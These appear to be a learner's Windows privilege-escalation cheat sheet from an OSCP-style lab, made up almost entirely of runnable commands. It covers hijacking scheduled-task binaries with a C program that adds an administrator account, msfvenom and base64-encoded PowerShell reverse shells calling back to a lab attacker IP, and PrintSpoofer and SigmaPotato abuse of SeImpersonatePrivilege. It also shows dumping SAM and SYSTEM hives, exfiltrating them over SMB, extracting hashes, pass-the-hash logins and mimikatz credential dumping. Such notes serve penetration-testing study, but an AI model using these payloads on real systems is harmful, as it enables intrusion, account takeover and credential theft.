Installed Applications (Application Based Exploit)
We need to check the installed software. Sometimes installed software has publically available exploits.
Kernal exploit
Abuse of SeImpersonatePrivilege
Using PrintSpoofer
Non-admin users with the SeImpersonatePrivilege can potentially escalate their privileges. This allows them to act as another user under certain conditions. While intended for legitimate use in services like RPC, it's often assigned too broadly (e.g., to Administrators), creating a potential attack vector.
Using SigmaPotato
We can use this to run a command or get the shell.
# We will check for Task running with higher privilege.
# We will check when task is going to be retriggered. (If retriggered again soon then it can be helpful).
# In the majority of cases, we can leverage familiar tactics such as replacing the binary or placing a missing DLL as we did with services in a previous Learning Unit. While we don't have a service binary with scheduled tasks, we have programs and scripts specified by actions.
# -----
# Step 1: Check for Task with higher Privilege.
schtasks /query /fo LIST /v > tasks.txt
.\tasks.txt
# Look for path that the user can modify.
Get-Content .\tasks.txt | Select-String -Pattern "Task To Run.*Users.*exe.*" -Context 7,0
# Other way:
Get-Content .\tasks.txt | Select-String -Pattern "Task To Run.*exe.*" -Context 7,0 | Where-Object {$_ -notmatch "system32" }
# More preferred way:
Get-Content .\tasks.txt | Select-String -Pattern "Task To Run.*" -Context 7,0 | Where-Object { $_ -notmatch "system32" -and $_ -notmatch "Next Run Time:\s+N/A" }
# "Task To Run.*Users": This regular expression matches lines containing "Task To Run" followed by any characters (.*), and then "Users".
# We can use "-Context 0,1" to make search easy.
# -Context 0,1: Shows 0 lines before and 1 line after each match.
# Change above command as per need.
# Check the permission for the user on the path.
icacals <Location>
# Step 2: Check the time when it will next run in above command output. If it is going to run in near future then replace the file with made exe.
# Other way:
# Below is powershell command:
Get-ScheduledTask
# Look at the permission use has on that scheduled binary.
icacals <Location>
adduser.c
#include <stdlib.h>
int main ()
{
int i;
// Add the user 'dave2' with the password 'password123!'
i = system ("net user dave2 password123! /add");
// Add 'dave2' to the Administrators group
i = system ("net localgroup administrators dave2 /add");
// Add 'dave2' to the Remote Desktop Users group
i = system ("net localgroup \"Remote Desktop Users\" dave2 /add");
return 0;
}
# Compiling the code to exe
x86_64-w64-mingw32-gcc addusers.c -o adduser.exe
# Sending file to victim.
iwr -uri http://$IP_KALI/adduser.exe -o adduser.exe
# Now Replace the binary file.
# Replace the original binary with this one.
# Don't replace it first save original binary file.
# Example
move C:\Users\steve\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe
move .\adduser.exe C:\Users\steve\Pictures\BackendCacheCleanup.exe
# Now wait for exe file to auto run.
# Making Reverse exe file.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_KALI LPORT=80 -f exe -o reverse.exe
# Start the listener.
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set LHOST $IP_KALI; set LPORT 80; run"
# Now replace in the location where you found write permission.
# You can use SMB share to copy file.
# Now wait for task to auto run.
# To Get List of installed software 32 bit
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# To Get List of installed software 64 bit
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# Look for OS Version
systeminfo
# Look for a security patch installed on the system.
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }
# Download the publically available exploit and run it to get the shell.
# Related to This CVE-2023-29360, Details and .exe file is mentioned in module.
# Check if SeImpersonatePrivilege is there with user or not.
whoami /priv
# if enabled then use printSpoofer to elevate the privilege.
# Run in kali linux
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe; python3 -m http.server 8000
# In windows's Powershell
iwr -uri http://192.168.45.215:8000/PrintSpoofer64.exe -outfile PrintSpoofer64.exe
# Run the file.
.\PrintSpoofer64.exe -i -c powershell.exe
# You will see your priviege is escalated.
# we can also use reverse payload for getting shell.
# Shell is generated using https://www.revshells.com/
# example:
.\PrintSpoofer64.exe -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA1ACIALAA4ADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
# Check if SeImpersonatePrivilege is there with the user or not.
whoami /priv
# In Kali
# Download this tool:
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
# Start webserver and sent it to victim machine.
python3 -m http.server 8000
# Send it to victim machine.
iwr -uri http://192.168.45.229:8000/SigmaPotato.exe -Outfile SigmaPotato.exe
# Add new user:
.\SigmaPotato "net user dave4 lab /add"
.\SigmaPotato "net localgroup Administrators dave4 /add"
# Now we can access this user as RDP also.
xfreerdp /v:192.168.109.220 /u:dave4 /p:lab /cert-ignore /dynamic-resolution
# Got GUI access.
# Getting shell (Tried but not working in my case):
.\SigmaPotato.exe --revshell $IP_KALI 4444
# Example:
# .\SigmaPotato.exe --revshell 192.168.45.229 4444
# it did not work. Let's try base64 encoded reverse powershell code.
# Generate code using Python code:
wget https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py
python3 mkpsrevshell.py $IP_KALI 4444
# Start listener.
sudo rlwrap nc -lnvp 4444
# Run below command:
.\SigmaPotato.exe "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA5ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
# Not got the shell.
# . This privilege allows you to bypass normal file read restrictions, even if you don’t have explicit permissions, as it provides "backup and restore" access to files.
# Let's abuse it.
# I will dump
reg save hklm\system system.bak
reg save hklm\sam sam.bak
# Now I will download it to kali linux.
# Transfer file to kali linux.
# Start smbserver in kali linux
impacket-smbserver -smb2support -username user -password user123 drive .
# In windows shell.
net use Z: \\192.168.45.229\drive /u:user user123
copy sam.bak Z:
copy system.bak Z:
# Now extract the hashes using secretdump.
impacket-secretsdump -sam sam.bak -system system.bak LOCAL
# Use hash to login to user of your choice.
# Example:
impacket-psexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:8f518eb35353d7a83d27e7fe457664e5
# Use mimikatz for this.
./mimikatz.exe "privilege::debug" "token::elevate" "log" "sekurlsa::logonpasswords full" "sekurlsa::minidump lsass.dmp" "exit"
